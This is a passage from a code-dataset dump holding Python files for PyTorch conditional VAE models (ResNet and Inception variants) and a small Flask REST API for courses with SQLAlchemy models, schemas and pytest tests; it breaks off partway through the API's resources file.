"UTF-8", "text": "import torch\nfrom torch import nn\nfrom torch.nn import functional as F\n\nfrom .cvae_base import CvaeBase\nfrom .utils import spec_to_db\n\n\nclass CvaeResnet(CvaeBase):\n model_name = 'CvaeResnet'\n\n def __init__(self, configs):\n super().__init__(configs)\n self.save_hyperparameters()\n valid_encoders = {\n 'resnet18': {'enc': resnet18_encoder, 'dec': resnet18_decoder},\n 'resnet50': {'enc': resnet50_encoder, 'dec': resnet50_decoder},\n }\n c_length = len(configs['c_labels'])\n # Encoder\n self.encoder = valid_encoders[configs['enc_type']]['enc'](configs['channel_size'], \n configs['first_conv'], \n configs['maxpool1'])\n # Bottleneck\n self.fc_mu = nn.Linear(configs['enc_out_dim'] + c_length, \n configs['latent_size'])\n self.fc_logvar = nn.Linear(configs['enc_out_dim'] + c_length, \n configs['latent_size'])\n # Decoder\n self.decoder = valid_encoders[configs['enc_type']]['dec'](configs['channel_size'], \n configs['latent_size'] + c_length, \n configs['input_height'], \n configs['first_conv'], \n configs['maxpool1'])\n\n def _loss_function(self, x_true, x_rec, mean, log_var, z):\n # reconstruction\n rec = F.mse_loss(x_rec, x_true, reduction='mean')\n # db mag reconstruction\n x_rec_db = spec_to_db(x_rec)\n x_true_db = spec_to_db(x_true)\n rec_db = F.mse_loss(x_rec_db, x_true_db, reduction='mean')\n # kl divergence\n std = torch.exp(log_var / 2)\n p = torch.distributions.Normal(torch.zeros_like(mean), torch.ones_like(std))\n q = torch.distributions.Normal(mean, std)\n log_qz = q.log_prob(z)\n log_pz = p.log_prob(z)\n kld = log_qz - log_pz\n kld = kld.mean()\n # total\n loss = rec + (rec_db * self.configs['db_coeff']) + (kld * self.configs['kl_coeff'])\n return {\n 'rec': rec, \n 'rec_db': rec_db,\n 'kl': kld,\n 'loss': loss\n }\n \n def _shared_eval(self, x_true, c):\n # calculate latent vector\n hidden_enc = self.encoder(x_true)\n hidden_enc = torch.cat((hidden_enc, c), dim=-1)\n mean, log_var = self.fc_mu(hidden_enc), self.fc_logvar(hidden_enc)\n z = self._reparameterize(mean, log_var)\n # reconstruct\n zc = torch.cat((z, c), dim=-1)\n x_rec = self.decoder(zc)\n return x_rec, mean, log_var, z\n \n def forward(self, z, c):\n z = torch.cat((z, c), dim=-1)\n return self.decoder(z)\n\n \n \n# https://github.com/PyTorchLightning/pytorch-lightning-bolts/pl_bolts/models/autoencoders/components.py\nclass Interpolate(nn.Module):\n \"\"\"nn.Module wrapper for F.interpolate\"\"\"\n\n def __init__(self, size=None, scale_factor=None):\n super().__init__()\n self.size, self.scale_factor = size, scale_factor\n\n def forward(self, x):\n return F.interpolate(x, size=self.size, scale_factor=self.scale_factor)\n\n\ndef conv3x3(in_planes, out_planes, stride=1):\n \"\"\"3x3 convolution with padding\"\"\"\n return nn.Conv2d(in_planes, out_planes, kernel_size=3, stride=stride, padding=1, bias=False)\n\n\ndef conv1x1(in_planes, out_planes, stride=1):\n \"\"\"1x1 convolution\"\"\"\n return nn.Conv2d(in_planes, out_planes, kernel_size=1, stride=stride, bias=False)\n\n\ndef resize_conv3x3(in_planes, out_planes, scale=1):\n \"\"\"upsample + 3x3 convolution with padding to avoid checkerboard artifact\"\"\"\n if scale == 1:\n return conv3x3(in_planes, out_planes)\n else:\n return nn.Sequential(Interpolate(scale_factor=scale), conv3x3(in_planes, out_planes))\n\n\ndef resize_conv1x1(in_planes, out_planes, scale=1):\n \"\"\"upsample + 1x1 convolution with padding to avoid checkerboard artifact\"\"\"\n if scale == 1:\n return conv1x1(in_planes, out_planes)\n else:\n return nn.Sequential(Interpolate(scale_factor=scale), conv1x1(in_planes, out_planes))\n\n\nclass EncoderBlock(nn.Module):\n \"\"\"\n ResNet block, copied from\n https://github.com/pytorch/vision/blob/master/torchvision/models/resnet.py#L35\n \"\"\"\n\n expansion = 1\n\n def __init__(self, inplanes, planes, stride=1, downsample=None):\n super().__init__()\n self.conv1 = conv3x3(inplanes, planes, stride)\n self.bn1 = nn.BatchNorm2d(planes)\n self.relu = nn.ReLU(inplace=True)\n self.conv2 = conv3x3(planes, planes)\n self.bn2 = nn.BatchNorm2d(planes)\n self.downsample = downsample\n\n def forward(self, x):\n identity = x\n\n out = self.conv1(x)\n out = self.bn1(out)\n out = self.relu(out)\n\n out = self.conv2(out)\n out = self.bn2(out)\n\n if self.downsample is not None:\n identity = self.downsample(x)\n\n out += identity\n out = self.relu(out)\n\n return out\n\n\nclass EncoderBottleneck(nn.Module):\n \"\"\"\n ResNet bottleneck, copied from\n https://github.com/pytorch/vision/blob/master/torchvision/models/resnet.py#L75\n \"\"\"\n\n expansion = 4\n\n def __init__(self, inplanes, planes, stride=1, downsample=None):\n super().__init__()\n width = planes # this needs to change if we want wide resnets\n self.conv1 = conv1x1(inplanes, width)\n self.bn1 = nn.BatchNorm2d(width)\n self.conv2 = conv3x3(width, width, stride)\n self.bn2 = nn.BatchNorm2d(width)\n self.conv3 = conv1x1(width, planes * self.expansion)\n self.bn3 = nn.BatchNorm2d(planes * self.expansion)\n self.relu = nn.ReLU(inplace=True)\n self.downsample = downsample\n self.stride = stride\n\n def forward(self, x):\n identity = x\n\n out = self.conv1(x)\n out = self.bn1(out)\n out = self.relu(out)\n\n out = self.conv2(out)\n out = self.bn2(out)\n out = self.relu(out)\n\n out = self.conv3(out)\n out = self.bn3(out)\n\n if self.downsample is not None:\n identity = self.downsample(x)\n\n out += identity\n out = self.relu(out)\n return out\n\n\nclass DecoderBlock(nn.Module):\n \"\"\"\n ResNet block, but convs replaced with resize convs, and channel increase is in\n second conv, not first\n \"\"\"\n\n expansion = 1\n\n def __init__(self, inplanes, planes, scale=1, upsample=None):\n super().__init__()\n self.conv1 = resize_conv3x3(inplanes, inplanes)\n self.bn1 = nn.BatchNorm2d(inplanes)\n self.relu = nn.ReLU(inplace=True)\n self.conv2 = resize_conv3x3(inplanes, planes, scale)\n self.bn2 = nn.BatchNorm2d(planes)\n self.upsample = upsample\n\n def forward(self, x):\n identity = x\n\n out = self.conv1(x)\n out = self.bn1(out)\n out = self.relu(out)\n\n out = self.conv2(out)\n out = self.bn2(out)\n\n if self.upsample is not None:\n identity = self.upsample(x)\n\n out += identity\n out = self.relu(out)\n\n return out\n\n\nclass DecoderBottleneck(nn.Module):\n \"\"\"\n ResNet bottleneck, but convs replaced with resize convs\n \"\"\"\n\n expansion = 4\n\n def __init__(self, inplanes, planes, scale=1, upsample=None):\n super().__init__()\n width = planes # this needs to change if we want wide resnets\n self.conv1 = resize_conv1x1(inplanes, width)\n self.bn1 = nn.BatchNorm2d(width)\n self.conv2 = resize_conv3x3(width, width, scale)\n self.bn2 = nn.BatchNorm2d(width)\n self.conv3 = conv1x1(width, planes * self.expansion)\n self.bn3 = nn.BatchNorm2d(planes * self.expansion)\n self.relu = nn.ReLU(inplace=True)\n self.upsample = upsample\n self.scale = scale\n\n def forward(self, x):\n identity = x\n\n out = self.conv1(x)\n out = self.bn1(out)\n out = self.relu(out)\n\n out = self.conv2(out)\n out = self.bn2(out)\n out = self.relu(out)\n\n out = self.conv3(out)\n out = self.bn3(out)\n\n if self.upsample is not None:\n identity = self.upsample(x)\n\n out += identity\n out = self.relu(out)\n return out\n\n\nclass ResNetEncoder(nn.Module):\n def __init__(self, block, layers, channel_size, first_conv=False, maxpool1=False):\n super().__init__()\n\n self.inplanes = 64\n self.first_conv = first_conv\n self.maxpool1 = maxpool1\n\n if self.first_conv:\n self.conv1 = nn.Conv2d(channel_size, self.inplanes, kernel_size=7, stride=2, padding=3, bias=False)\n else:\n self.conv1 = nn.Conv2d(channel_size, self.inplanes, kernel_size=3, stride=1, padding=1, bias=False)\n\n self.bn1 = nn.BatchNorm2d(self.inplanes)\n self.relu = nn.ReLU(inplace=True)\n\n if self.maxpool1:\n self.maxpool = nn.MaxPool2d(kernel_size=3, stride=2, padding=1)\n else:\n self.maxpool = nn.MaxPool2d(kernel_size=1, stride=1)\n\n self.layer1 = self._make_layer(block, 64, layers[0])\n self.layer2 = self._make_layer(block, 128, layers[1], stride=2)\n self.layer3 = self._make_layer(block, 256, layers[2], stride=2)\n self.layer4 = self._make_layer(block, 512, layers[3], stride=2)\n self.avgpool = nn.AdaptiveAvgPool2d((1, 1))\n\n def _make_layer(self, block, planes, blocks, stride=1):\n downsample = None\n if stride != 1 or self.inplanes != planes * block.expansion:\n downsample = nn.Sequential(\n conv1x1(self.inplanes, planes * block.expansion, stride),\n nn.BatchNorm2d(planes * block.expansion),\n )\n\n layers = []\n layers.append(block(self.inplanes, planes, stride, downsample))\n self.inplanes = planes * block.expansion\n for _ in range(1, blocks):\n layers.append(block(self.inplanes, planes))\n\n return nn.Sequential(*layers)\n\n def forward(self, x):\n x = self.conv1(x)\n x = self.bn1(x)\n x = self.relu(x)\n x = self.maxpool(x)\n\n x = self.layer1(x)\n x = self.layer2(x)\n x = self.layer3(x)\n x = self.layer4(x)\n\n x = self.avgpool(x)\n x = torch.flatten(x, 1)\n return x\n\n\nclass ResNetDecoder(nn.Module):\n \"\"\"\n Resnet in reverse order\n \"\"\"\n\n def __init__(self, block, layers, channel_size, latent_dim, input_height, first_conv=False, maxpool1=False):\n super().__init__()\n\n self.expansion = block.expansion\n self.inplanes = 512 * block.expansion\n self.first_conv = first_conv\n self.maxpool1 = maxpool1\n self.input_height = input_height\n\n self.upscale_factor = 8\n\n self.linear = nn.Linear(latent_dim, self.inplanes * 4 * 4)\n\n self.layer1 = self._make_layer(block, 256, layers[0], scale=2)\n self.layer2 = self._make_layer(block, 128, layers[1], scale=2)\n self.layer3 = self._make_layer(block, 64, layers[2], scale=2)\n\n if self.maxpool1:\n self.layer4 = self._make_layer(block, 64, layers[3], scale=2)\n self.upscale_factor *= 2\n else:\n self.layer4 = self._make_layer(block, 64, layers[3])\n\n if self.first_conv:\n self.upscale = Interpolate(scale_factor=2)\n self.upscale_factor *= 2\n else:\n self.upscale = Interpolate(scale_factor=1)\n\n # interpolate after linear layer using scale factor\n self.upscale1 = Interpolate(size=input_height // self.upscale_factor)\n\n self.conv1 = nn.Conv2d(64 * block.expansion, channel_size, kernel_size=3, stride=1, padding=1, bias=False)\n\n def _make_layer(self, block, planes, blocks, scale=1):\n upsample = None\n if scale != 1 or self.inplanes != planes * block.expansion:\n upsample = nn.Sequential(\n resize_conv1x1(self.inplanes, planes * block.expansion, scale),\n nn.BatchNorm2d(planes * block.expansion),\n )\n\n layers = []\n layers.append(block(self.inplanes, planes, scale, upsample))\n self.inplanes = planes * block.expansion\n for _ in range(1, blocks):\n layers.append(block(self.inplanes, planes))\n\n return nn.Sequential(*layers)\n\n def forward(self, x):\n x = self.linear(x)\n\n # NOTE: replaced this by Linear(in_channels, 514 * 4 * 4)\n # x = F.interpolate(x, scale_factor=4)\n\n x = x.view(x.size(0), 512 * self.expansion, 4, 4)\n x = self.upscale1(x)\n\n x = self.layer1(x)\n x = self.layer2(x)\n x = self.layer3(x)\n x = self.layer4(x)\n x = self.upscale(x)\n\n x = self.conv1(x)\n return x\n\n\ndef resnet18_encoder(channel_size, first_conv, maxpool1):\n return ResNetEncoder(EncoderBlock, [2, 2, 2, 2], channel_size, first_conv, maxpool1)\n\n\ndef resnet18_decoder(channel_size, latent_dim, input_height, first_conv, maxpool1):\n return ResNetDecoder(DecoderBlock, [2, 2, 2, 2], channel_size, latent_dim, input_height, first_conv, maxpool1)\n\n\ndef resnet50_encoder(channel_size, first_conv, maxpool1):\n return ResNetEncoder(EncoderBottleneck, [3, 4, 6, 3], channel_size, first_conv, maxpool1)\n\n\ndef resnet50_decoder(channel_size, latent_dim, input_height, first_conv, maxpool1):\n return ResNetDecoder(DecoderBottleneck, [3, 4, 6, 3], channel_size, latent_dim, input_height, first_conv, maxpool1)" }, { "alpha_fraction": 0.5873967409133911, "alphanum_fraction": 0.60877925157547, "avg_line_length": 41.090476989746094, "blob_id": "16183d8e7202c6a8c8174b33d72c59131d85afa1", "content_id": "aa8ce520427037a0f273ed6b579d88f1e9cc9d4d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 8839, "license_type": "no_license", "max_line_length": 117, "num_lines": 210, "path": "/models/cvae_inception.py", "repo_name": "miccio-dk/sound_morph", "src_encoding": "UTF-8", "text": "import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\nfrom .cvae_base import CvaeBase\nfrom .utils import spec_to_db\n\n\nclass CvaeInception(CvaeBase):\n model_name = 'CvaeInception'\n \n def __init__(self, configs):\n super().__init__(configs)\n self.db_weight = 1\n use_inception, repeat_per_block = configs['use_inception'], configs['repeat_per_block']\n # Encoder\n self.encoder = Encoder(configs['channel_size'], use_inception, repeat_per_block)\n # Bottleneck\n self.fc_mu = nn.Linear(configs['dense_size'] + len(configs['c_labels']), configs['latent_size'])\n self.fc_logvar = nn.Linear(configs['dense_size'] + len(configs['c_labels']), configs['latent_size'])\n self.fc_rep = nn.Linear(configs['latent_size'] + len(configs['c_labels']), configs['dense_size'])\n # Decoder\n self.decoder = Decoder(configs['channel_size'], use_inception, repeat_per_block)\n\n def _loss_function(self, x_true, x_rec, mean, log_var, z):\n # reconstruction\n #rec = torch.nn.functional.binary_cross_entropy(x_rec, x_true, reduction='mean')\n rec = torch.nn.functional.mse_loss(x_rec, x_true, reduction='mean')\n # db mag reconstruction\n x_rec_db = spec_to_db(x_rec, **self.configs['db_kwargs'])\n x_true_db = spec_to_db(x_true, **self.configs['db_kwargs'])\n rec_db = F.mse_loss(x_rec_db, x_true_db, reduction='mean')\n # kl divergence\n kld = torch.mean(-0.5 * torch.sum(1 + log_var - mean.pow(2) - log_var.exp(), dim=1), dim=0)\n # total\n loss = rec + (rec_db * self.configs['db_coeff'] * self.db_weight) + (kld * self.configs['kl_coeff'])\n return {\n 'rec': rec, \n 'rec_db': rec_db,\n 'kl': kld,\n 'loss': loss\n }\n\n def _shared_eval(self, x_true, c):\n # calculate latent vector\n hidden_enc = self.encoder(x_true)\n hidden_enc = torch.cat((hidden_enc, c), dim=-1)\n mean, log_var = self.fc_mu(hidden_enc), self.fc_logvar(hidden_enc)\n z = self._reparameterize(mean, log_var)\n # reconstruct\n zc = torch.cat((z, c), dim=-1)\n hidden_dec = self.fc_rep(zc)\n x_rec = self.decoder(hidden_dec)\n return x_rec, mean, log_var, z\n \n # TODO encode() / decode() functions?\n \n def forward(self, z, c):\n z = torch.cat((z, c), dim=-1)\n hidden_dec = self.fc_rep(z)\n return self.decoder(hidden_dec)\n \n def on_epoch_start(self):\n self.db_weight *= self.configs['db_decay']\n \n\n \n# Inception-vae - https://github.com/koshian2/inception-vae\n## Encoder\ndef create_encoder_single_conv(in_chs, out_chs, kernel):\n assert kernel % 2 == 1\n return nn.Sequential(\n nn.Conv2d(in_chs, out_chs, kernel_size=kernel, padding=(kernel - 1) // 2),\n nn.BatchNorm2d(out_chs),\n nn.ReLU(inplace=True))\n\nclass EncoderInceptionModuleSingle(nn.Module):\n def __init__(self, channels):\n assert channels % 2 == 0\n super().__init__()\n # put bottle-neck layers before convolution\n bn_ch = channels // 2\n self.bottleneck = create_encoder_single_conv(channels, bn_ch, 1)\n # bn -> Conv1, 3, 5\n self.conv1 = create_encoder_single_conv(bn_ch, channels, 1)\n self.conv3 = create_encoder_single_conv(bn_ch, channels, 3)\n self.conv5 = create_encoder_single_conv(bn_ch, channels, 5)\n self.conv7 = create_encoder_single_conv(bn_ch, channels, 7)\n # pool-proj(no-bottle neck)\n self.pool3 = nn.MaxPool2d(3, stride=1, padding=1)\n self.pool5 = nn.MaxPool2d(5, stride=1, padding=2)\n\n def forward(self, x):\n # Original inception is concatenation, but use simple addition instead\n bn = self.bottleneck(x)\n out = self.conv1(bn) + self.conv3(bn) + self.conv5(bn) + self.conv7(bn) + self.pool3(x) + self.pool5(x)\n return out\n\nclass EncoderModule(nn.Module):\n def __init__(self, chs, repeat_num, use_inception):\n super().__init__()\n if use_inception:\n layers = [EncoderInceptionModuleSingle(chs) for i in range(repeat_num)]\n else:\n layers = [create_encoder_single_conv(chs, chs, 3) for i in range(repeat_num)]\n self.convs = nn.Sequential(*layers)\n\n def forward(self, x):\n return self.convs(x)\n\nclass Encoder(nn.Module):\n def __init__(self, in_channel_size, use_inception, repeat_per_module):\n super().__init__()\n # stages\n self.upch1 = nn.Conv2d(in_channel_size, 32, kernel_size=1)\n self.stage1 = EncoderModule(32, repeat_per_module, use_inception)\n self.upch2 = self._create_downsampling_module(32, 4)\n self.stage2 = EncoderModule(64, repeat_per_module, use_inception)\n self.upch3 = self._create_downsampling_module(64, 4)\n self.stage3 = EncoderModule(128, repeat_per_module, use_inception)\n self.upch4 = self._create_downsampling_module(128, 2)\n self.stage4 = EncoderModule(256, repeat_per_module, use_inception)\n\n def _create_downsampling_module(self, input_channels, pooling_kenel):\n return nn.Sequential(\n nn.AvgPool2d(pooling_kenel),\n nn.Conv2d(input_channels, input_channels * 2, kernel_size=1),\n nn.BatchNorm2d(input_channels * 2),\n nn.ReLU(inplace=True)\n )\n\n def forward(self, x):\n out = self.stage1(self.upch1(x))\n out = self.stage2(self.upch2(out))\n out = self.stage3(self.upch3(out))\n out = self.stage4(self.upch4(out))\n out = F.avg_pool2d(out, 8) # Global Average pooling\n return out.view(-1, 256) # TODO un-hardcode linear features\n\n## Decoder\ndef create_decoder_single_conv(in_chs, out_chs, kernel):\n assert kernel % 2 == 1\n return nn.Sequential(\n nn.ConvTranspose2d(in_chs, out_chs, kernel_size=kernel, padding=(kernel - 1) // 2),\n nn.BatchNorm2d(out_chs),\n nn.ReLU(inplace=True))\n\nclass DecoderInceptionModuleSingle(nn.Module):\n def __init__(self, channels):\n assert channels % 2 == 0\n super().__init__()\n # put bottle-neck layers before convolution\n bn_ch = channels // 4\n self.bottleneck = create_decoder_single_conv(channels, bn_ch, 1)\n # bn -> Conv1, 3, 5\n self.conv1 = create_decoder_single_conv(bn_ch, channels, 1)\n self.conv3 = create_decoder_single_conv(bn_ch, channels, 3)\n self.conv5 = create_decoder_single_conv(bn_ch, channels, 5)\n self.conv7 = create_decoder_single_conv(bn_ch, channels, 7)\n # pool-proj(no-bottle neck)\n self.pool3 = nn.MaxPool2d(3, stride=1, padding=1)\n self.pool5 = nn.MaxPool2d(5, stride=1, padding=2)\n\n def forward(self, x):\n # Original inception is concatenation, but use simple addition instead\n bn = self.bottleneck(x)\n out = self.conv1(bn) + self.conv3(bn) + self.conv5(bn) + self.conv7(bn) + self.pool3(x) + self.pool5(x)\n return out\n\nclass DecoderModule(nn.Module):\n def __init__(self, chs, repeat_num, use_inception):\n super().__init__()\n if use_inception:\n layers = [DecoderInceptionModuleSingle(chs) for i in range(repeat_num)]\n else:\n layers = [create_decoder_single_conv(chs, chs, 3) for i in range(repeat_num)]\n self.convs = nn.Sequential(*layers)\n\n def forward(self, x):\n return self.convs(x)\n\n\nclass Decoder(nn.Module):\n def __init__(self, out_channel_size, use_inception, repeat_per_module):\n super().__init__()\n # stages\n self.stage1 = DecoderModule(256, repeat_per_module, use_inception)\n self.downch1 = self._create_upsampling_module(256, 2)\n self.stage2 = DecoderModule(128, repeat_per_module, use_inception)\n self.downch2 = self._create_upsampling_module(128, 4)\n self.stage3 = DecoderModule(64, repeat_per_module, use_inception)\n self.downch3 = self._create_upsampling_module(64, 4)\n self.stage4 = DecoderModule(32, repeat_per_module, use_inception)\n self.last = nn.ConvTranspose2d(32, out_channel_size, kernel_size=1)\n\n def _create_upsampling_module(self, input_channels, pooling_kenel):\n return nn.Sequential(\n nn.ConvTranspose2d(input_channels, input_channels // 2, kernel_size=pooling_kenel, stride=pooling_kenel),\n nn.BatchNorm2d(input_channels // 2),\n nn.ReLU(inplace=True)\n )\n\n def forward(self, x):\n out = F.interpolate(x.view(-1, 256, 1, 1), scale_factor=8)\n out = self.downch1(self.stage1(out))\n out = self.downch2(self.stage2(out))\n out = self.downch3(self.stage3(out))\n out = self.stage4(out)\n #return torch.sigmoid(self.last(out))\n return self.last(out)\n" } ]
11
yarik2215/yalantis-test
https://github.com/yarik2215/yalantis-test
2a445a54532734e634efa8657d2b426eb9b96335
fa3509a3388b5cc4d4f0d92c390f525ee28e7c51
c243030cc414828fddd85d08a2ec2fc7d346fda0
refs/heads/master
2023-04-13T10:25:08.561030
2021-04-21T09:02:52
2021-04-21T09:02:52
360,102,596
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.676369845867157, "alphanum_fraction": 0.681506872177124, "avg_line_length": 24.434782028198242, "blob_id": "49999ef5c82b1f5420fe3295d6794470280c025e", "content_id": "dfd42f61c86f529943edc8785ffc5cd29e7850b6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 584, "license_type": "no_license", "max_line_length": 61, "num_lines": 23, "path": "/courses_app/routes.py", "repo_name": "yarik2215/yalantis-test", "src_encoding": "UTF-8", "text": "from flask import Blueprint\nfrom flask.app import Flask\nfrom flask_restful import Api, Resource\nfrom courses_app import resources\n\n\ndef register_routes(_app: Flask):\n \"\"\"Registers api resources/routes with Flask app\n\n Args:\n _app (object): Flask app object\n\n \"\"\"\n\n api_blueprint = Blueprint(\"api\", __name__)\n api = Api(api_blueprint, catch_all_404s=False)\n\n api.add_resource(\n resources.CoursesList, \"/courses\")\n api.add_resource(\n resources.CoursesDetailed, \"/courses/<int:id>\")\n\n _app.register_blueprint(api_blueprint, url_prefix=\"/api\")" }, { "alpha_fraction": 0.5556536912918091, "alphanum_fraction": 0.5914310812950134, "avg_line_length": 22.842105865478516, "blob_id": "606189ee8a07db2cdafdd78cd9cd8cb03c5a47ce", "content_id": "a2b89b836f37bb5918ec2dceb2378a0ddc0dccca", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2264, "license_type": "no_license", "max_line_length": 74, "num_lines": 95, "path": "/tests/test_api.py", "repo_name": "yarik2215/yalantis-test", "src_encoding": "UTF-8", "text": "import pytest\nimport datetime\n\nfrom courses_app.models import Course\n\n\ndef test_retrieve_emty_list(client, database):\n response = client.get(\n '/courses'\n )\n assert response.json == []\n\n\ndef test_retrieve_courses_list(client, courses):\n response = client.get(\n '/courses'\n )\n assert len(response.json) == len(courses)\n assert [i['name'] for i in response.json] == [i.name for i in courses]\n\n\ndef test_create_course_200_ok(client, database):\n course_data = {\n \"name\": \"3\",\n \"starting_date\": \"2020-05-01\",\n \"ending_date\": \"2020-08-12\",\n \"lectures_count\": 3\n }\n response = client.post(\n '/courses',\n json = course_data\n )\n response.json.pop('id')\n assert response.status_code == 200\n assert response.json == course_data\n\n\ndef test_course_name_unique_constrain(client, courses):\n course_data = {\n \"name\": courses[0].name,\n \"starting_date\": \"2020-5-1\",\n \"ending_date\": \"2020-8-12\",\n \"lectures_count\": 3\n }\n response = client.post(\n '/courses',\n json = course_data\n )\n assert response.status_code == 400\n\n\ndef test_course_retrieve_by_id_200_ok(client, courses):\n id = 1\n course = Course.query.get(id)\n response = client.get(\n f'/courses/{id}'\n )\n assert response.status_code == 200\n assert response.json['name'] == course.name\n\n\ndef test_delete_course_by_id_200_ok(client, courses):\n id = 1\n response = client.delete(\n f'/courses/{id}'\n )\n course = Course.query.get(id)\n assert response.status_code == 200\n assert course is None\n\n\ndef test_try_to_delete_not_existed_course(client, courses):\n id = 1245\n response = client.delete(\n f'/courses/{id}'\n )\n assert response.status_code == 400\n\n\ndef test_update_course_attributes(client, courses):\n id = 1\n course_data = {\n \"name\": \"New name\",\n \"starting_date\": \"2020-5-1\",\n \"ending_date\": \"2020-8-12\",\n \"lectures_count\": 8\n }\n response = client.put(\n f'/courses/{id}',\n json = course_data\n )\n course = Course.query.get(id)\n assert response.status_code == 200\n assert response.json['name'] == \"New name\"\n assert course.name == \"New name\"" }, { "alpha_fraction": 0.6648648381233215, "alphanum_fraction": 0.6702702641487122, "avg_line_length": 26.700000762939453, "blob_id": "942a3c163308c814262b2ba48742cb1cf927c1f8", "content_id": "075ad19643e9849ce096735cbbda514655151edf", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 555, "license_type": "no_license", "max_line_length": 58, "num_lines": 20, "path": "/courses_app/models.py", "repo_name": "yarik2215/yalantis-test", "src_encoding": "UTF-8", "text": "\nfrom flask_sqlalchemy import SQLAlchemy\nfrom sqlalchemy import MetaData\nfrom flask_migrate import Migrate\n\nmetadata = MetaData()\ndb = SQLAlchemy(metadata=metadata)\nmigrate = Migrate()\n\n\nclass Course(db.Model):\n __tablename__ = \"courses\"\n\n id = db.Column(db.Integer, primary_key=True)\n name = db.Column(db.String(255), unique=True)\n starting_date = db.Column(db.Date())\n ending_date = db.Column(db.Date())\n lectures_count = db.Column(db.Integer)\n\n def __repr__(self) -> str:\n return f\"<{self.__class__.__name__}: {self.name}>\"\n" }, { "alpha_fraction": 0.7518796920776367, "alphanum_fraction": 0.7518796920776367, "avg_line_length": 32.5, "blob_id": "24cf0499fb17a4db967eb9e066fa95fa5ab4fe82", "content_id": "09af552bb5c32a7d8919f1fb068650a577dbec66", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 133, "license_type": "no_license", "max_line_length": 57, "num_lines": 4, "path": "/README.md", "repo_name": "yarik2215/yalantis-test", "src_encoding": "UTF-8", "text": "## Run locally\n- set enviroment variables `export FLASK_APP=courses_app`\n- run migrations `flask db upgrade`\n- run server `flask run`" }, { "alpha_fraction": 0.6640759706497192, "alphanum_fraction": 0.6692573428153992, "avg_line_length": 20.07272720336914, "blob_id": "01e5ea13ed02b7d3b8a4ad2a7ba4b4955508626e", "content_id": "7a328375184f18d68a3bae9f21a0ea0ea14fb8a9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1158, "license_type": "no_license", "max_line_length": 119, "num_lines": 55, "path": "/tests/conftest.py", "repo_name": "yarik2215/yalantis-test", "src_encoding": "UTF-8", "text": "import os\nimport tempfile\nimport datetime\n\nimport pytest\n\nfrom courses_app import create_app\nfrom courses_app import settings\nfrom courses_app.models import db, Course\n\n\[email protected](scope=\"module\")\ndef app():\n db_fd, db_path = tempfile.mkstemp()\n\n class TestingConfig(settings.DevelopmentConfig):\n SQLALCHEMY_DATABASE_URI = f\"sqlite:///{db_path}\"\n\n app = create_app(TestingConfig)\n yield app\n\n os.close(db_fd)\n os.unlink(db_path)\n\n\[email protected]\ndef database(app):\n db.create_all()\n yield db\n db.drop_all()\n\n\[email protected]\ndef client(app):\n return app.test_client()\n\n\ndef create_course(\n name: str, starting_date: datetime.date = datetime.date.today(), duration_days: int = 10, lectures_count: int = 10 \n):\n return Course(\n name = name,\n starting_date = starting_date,\n ending_date = starting_date + datetime.timedelta(days=duration_days),\n lectures_count = lectures_count\n )\n\[email protected]\ndef courses(database):\n courses = [\n create_course(f'Course{i}', duration_days=i)\n for i in range(1, 5)\n ]\n database.session.add_all(courses)\n return courses" }, { "alpha_fraction": 0.6945606470108032, "alphanum_fraction": 0.6945606470108032, "avg_line_length": 25.55555534362793, "blob_id": "85d395b95092296bcc8637980b756ed79199f3c7", "content_id": "8038df05b21d5c9a36c79963171b0115f444656f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 239, "license_type": "no_license", "max_line_length": 39, "num_lines": 9, "path": "/courses_app/schemas.py", "repo_name": "yarik2215/yalantis-test", "src_encoding": "UTF-8", "text": "from marshmallow import Schema, fields\n\n\nclass CourseShema(Schema):\n id = fields.Integer(dump_only=True)\n name = fields.String()\n starting_date = fields.Date()\n ending_date = fields.Date()\n lectures_count = fields.Integer()\n" }, { "alpha_fraction": 0.6623853445053101, "alphanum_fraction": 0.6623853445053101, "avg_line_length": 19.185184478759766, "blob_id": "4e7b39619833a64dd11973ab2668894d7b4c77c1", "content_id": "8efa7e85c103af2e79b8b825d1acc5b3248b143d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 545, "license_type": "no_license", "max_line_length": 60, "num_lines": 27, "path": "/courses_app/__init__.py", "repo_name": "yarik2215/yalantis-test", "src_encoding": "UTF-8", "text": "from flask import Flask\n\nfrom courses_app import settings\nfrom courses_app.resources import api\n\n\ndef create_app(config_obj=None):\n app = Flask(__name__, static_folder=None)\n\n if not config_obj:\n app.logger.warning(\n \"No config specified; defaulting to development\"\n )\n config_obj = settings.DevelopmentConfig\n\n app.config.from_object(config_obj)\n\n from courses_app.models import db, migrate\n\n db.init_app(app)\n db.app = app\n\n migrate.init_app(app, db)\n\n api.init_app(app)\n\n return app\n" }, { "alpha_fraction": 0.616123616695404, "alphanum_fraction": 0.6190476417541504, "avg_line_length": 30.513158798217773, "blob_id": "8c9ca50f8e63e4ef8fccdfe959819c4cc1e804cc", "content_id": "53ce87a6dbf30fab46f5e9cfc2b0b857409d1a7f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2394, "license_type": "no_license", "max_line_length": 106, "num_lines": 76, "path": "/courses_app/resources.py", "repo_name": "yarik2215/yalantis-test", "src_encoding": "UTF-8", "text": "import datetime\nfrom flask import request, abort\nfrom flask_restplus import Resource, Api, fields\nfrom webargs import fields as args_fields\nfrom webargs.flaskparser import use_kwargs\nfrom sqlalchemy import exc\n\nfrom courses_app.models import Course, db\nfrom courses_app.schemas import CourseShema\n\n\napi = Api(doc='/docs')\n\ncourse_fields = api.model('Course', {\n 'name': fields.String,\n \"starting_date\": fields.Date,\n \"ending_date\": fields.Date,\n 'lectures_count': fields.Integer,\n})\n\n\[email protected]('/courses')\[email protected]()\nclass CoursesList(Resource):\n\n @api.doc(params={'q': 'name or part of it', 'date': 'date'})\n @use_kwargs({'q': args_fields.String(), 'date': args_fields.Date()}, location='query')\n def get(self, q: str = None, date: datetime.date = None):\n courses_query = Course.query\n if q:\n 